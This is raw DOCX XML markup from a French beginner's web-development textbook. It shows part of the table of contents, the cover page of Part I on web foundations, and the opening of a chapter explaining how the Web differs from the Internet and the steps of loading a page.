        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>44. Tester une interface : unité, intégration et bout en bout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>399</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>44.1 Trois niveaux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>399</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>44.2 Test unitaire</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>400</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>44.3 Test d'interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>401</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>44.4 Bout en bout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>402</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>44.5 Couverture et discipline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>403</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>45. Tableaux de données et listes longues</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>408</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>45.1 Tableau ou liste ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>408</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>45.2 Tri accessible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>409</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>45.3 Filtrer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>410</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>45.4 Grands volumes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>411</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>45.5 États et robustesse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>412</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId13"/>
          <w:footerReference w:type="default" r:id="rId14"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1474" w:right="1361" w:bottom="1361" w:left="1531" w:header="709" w:footer="652" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9014"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="11679" w:hRule="exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9240"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0F2E4C"/>
            <w:tcMar>
              <w:top w:w="800" w:type="dxa"/>
              <w:left w:w="680" w:type="dxa"/>
              <w:bottom w:w="800" w:type="dxa"/>
              <w:right w:w="680" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="E0A21B"/>
                <w:sz w:val="20"/>
                <w:spacing w:val="60"/>
              </w:rPr>
              <w:t>PARTIE I</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TitrePartie"/>
              <w:spacing w:before="0" w:after="160" w:line="680" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:t>Les fondations du Web</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="16" w:space="1" w:color="E0A21B"/>
              </w:pBdr>
              <w:spacing w:before="0" w:after="200"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="280" w:line="330" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="D6E1EB"/>
                <w:sz w:val="23"/>
              </w:rPr>
              <w:t>Comprendre le fonctionnement du Web, préparer son environnement et écrire ses premières pages HTML valides.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="E0A21B"/>
                <w:sz w:val="16"/>
                <w:spacing w:val="40"/>
              </w:rPr>
              <w:t>CHAPITRES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:line="270" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="C9D6E2"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1. Comment fonctionne le Web · 2. Installer et maîtriser son environnement · 3. La structure d'un document HTML5 · 4. Texte, listes et sémantique · 5. Liens et navigation · 6. Images, vidéos et audio · 7. Tableaux de données · 8. Formulaires HTML</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1. Comment fonctionne le Web</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Du câble au pixel : ce qui se passe réellement entre la barre d'adresse et l'affichage d'une page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 2 h 30 · Niveau : Débutant · Prérequis : aucun</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Distinguer Internet, le Web et les services qui les composent.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Décrire les étapes d'un chargement de page, de la résolution DNS au rendu.</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Expliquer le rôle respectif de HTML, CSS et JavaScript.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Préparer un environnement de travail minimal et fonctionnel.</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Servir une page locale par HTTP et non par simple ouverture de fichier.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>1.1 Le Web n'est pas Internet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La confusion est si répandue qu'elle fausse la compréhension de tout le reste. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Internet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est l'infrastructure : un réseau mondial de réseaux reliés par des câbles, des routeurs et des protocoles communs, dont le protocole IP. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est un service qui utilise cette infrastructure : un ensemble de documents reliés par des liens, échangés selon le protocole HTTP et identifiés par des URL.</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LE WEB</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Service d'information fondé sur trois inventions : l'URL (l'adresse d'une ressource), HTTP (le protocole de transport des messages) et HTML (le format des documents). Tim Berners-Lee en propose le principe au CERN en 1989.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Sur Internet circulent bien d'autres services : la messagerie électronique (SMTP, IMAP), le transfert de fichiers (SFTP), la résolution de noms (DNS), la visioconférence, les jeux en réseau. Le Web est l'un d'entre eux, sans doute le plus visible, mais il ne se confond pas avec le réseau qui le porte.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2603500"/>
            <wp:docPr id="3" name="Picture 3"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f01.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2603500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.1 — Six dates qui expliquent le Web d'aujourd'hui</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NoteFigure"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>Les dates retenues marquent des inflexions techniques, non des inventions isolées.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cette chronologie explique une caractéristique durable du Web : il a été conçu pour être </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>tolérant</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Un navigateur doit afficher une page même si une image manque, même si une règle CSS est invalide, même si un script échoue. Cette tolérance est une chance pour qui débute : une page imparfaite s'affiche quand même.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>1.2 Ce qui se passe quand vous ouvrez une page</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Saisissez une adresse, appuyez sur Entrée. En quelques centaines de millisecondes, une dizaine d'opérations s'enchaînent. Les comprendre vous évitera de chercher au mauvais endroit quand quelque chose ne fonctionne pas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3810000"/>
            <wp:docPr id="4" name="Picture 4"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f02.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3810000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.2 — Le trajet d'une requête HTTP</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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'URL est analysée.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Le navigateur identifie le schéma (http ou https), l'hôte, le port éventuel, le chemin, les paramètres et l'ancre.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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le nom est résolu.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Le système interroge un résolveur DNS pour traduire le nom de domaine en adresse IP. Le résultat est mis en cache.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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La connexion est établie.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> TCP ouvre une session avec le serveur ; si l'URL est en HTTPS, une poignée de main TLS négocie le chiffrement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>4.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La requête part.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Le navigateur envoie une méthode (GET le plus souvent), un chemin, une version de HTTP et des en-têtes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>5.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le serveur répond.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Il renvoie un code de statut, des en-têtes et un corps : généralement du HTML, parfois du JSON, une image, un fichier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>6.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le document est analysé.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Le navigateur construit l'arbre du document, télécharge les ressources référencées, calcule les styles, positionne les éléments et peint les pixels.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.1 — Les six étapes d'un chargement et leurs défaillances typiques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0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Étape</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="234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Ordre de grandeur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="396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Ce qui peut échouer</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Résolution DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2344"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
